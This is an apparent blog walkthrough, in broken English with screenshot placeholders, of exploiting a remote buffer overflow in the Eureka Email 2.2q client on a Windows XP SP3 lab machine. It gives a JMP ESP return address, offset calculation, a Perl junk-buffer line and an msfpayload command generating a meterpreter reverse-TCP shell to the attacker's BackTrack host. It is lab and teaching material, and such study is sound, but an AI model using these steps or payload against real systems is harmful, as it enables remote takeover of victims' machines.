Eureka Email 2.2q ERR Remote Buffer Overflow Exploit

=========================================

vicitm : window xp sp3 CHINESE

OS : bt5
(ip : 192.168.94.141)

—————————————–

this is the app and vuln info
and it not work in my victim before i modify it

=========================================
01a


1

=========================================

the vuln like this , direct RET overwrite

client connect the POP3 server ———>POP3 server reply the long or special code ————–> app creash and arbitrary code executed .

so , the bt5 will be prepare to a POP3

first , i will jump to esp ,and write a jumpback code at esp so i can use a large part of the buffer before overwriting RET.

and i will locate the address of esp , after reseach , the user32.dll was included

now , loading the user32.dll to Immunity debugger

i think it is the fast way to find out the jmp esp from user32.dll
=========================================
2

=========================================

Alt+E ————> double click == user32.dll

=========================================

3

=========================================

ctrl +F ———> jmp esp

and i can see that the jmp esp was appear (the top)

=========================================

4
=========================================

0x77D29353 JMP ESP

let me remember this address

ok , i was so happy that i can already handle it now , difference OS got difference address .

go to my perl script and running it

=========================================
5

6

7

=========================================

back to app ,
options———–connection setting ———- pop3 [incoming] (192.168.94.141)

this is my bt5 ip address

ok , Ctrl+ m to running the app

=========================================

8
=========================================

the calc.exe appear

that is what i need

now , i will showing the fellow code in my perl script . what is it? where it from ?

#######################

my $junk = “A” x (723 – length($localserver)) ;

########################

first , i have to goolge a plugin of Immunity debugger ——————– pvefindaddr

after i found it , i will put it at c:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

Also , i have to create 5000 pattern code to test vuln app

there are two way :

1. use plugin of pvefindaddr , i can type the command like this “!pvefindaddr pattern_create 5000”

2. use the tool of metasploit , where is it ? try “locate pattern_create ”

add the pattern code to my perl

=========================================

9
=========================================

1. run the perl

2.running the app in the Immunity debugger

3. Ctrl+m

=========================================

10
=========================================

now , input the commnad at Immunity debugger

“!pvefindaddr suggest”

the fellow picture will tell me everything

=========================================
11

=========================================

RET overwrite after 710 bytes, for make the exploit generic , i will use the 127.0.0.1 , which 4 bytes shorter than 192.168.94.141 , and the offset will be 714 bytes . Finally , caculate the offset size base on the ip local length ,723 – length($localserver).

In the other hand , the shellcode of calc.exe not my target , i want more powerful shellcode .

meterpreter , which is what i need .

try this

## bt5 command

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.94.141 R | msfencode -b “0x00” -e “x86/alpha_mixed” -t perl

replace the shellcode to my perl after it create

=========================================
12

=========================================

see what happen.

=========================================

13
=========================================

good !!

finally , for more simple to use this exploit , i will put it like a part of metasploit

first , there are already had one module in metasploit , what i need to do is to adding the RET .

=======================================
14

=======================================

running the metasploit and app

=======================================
15

16

=======================================

good !!

此条目发表在Uncategorized分类目录。将固定链接加入收藏夹。

评论功能已关闭。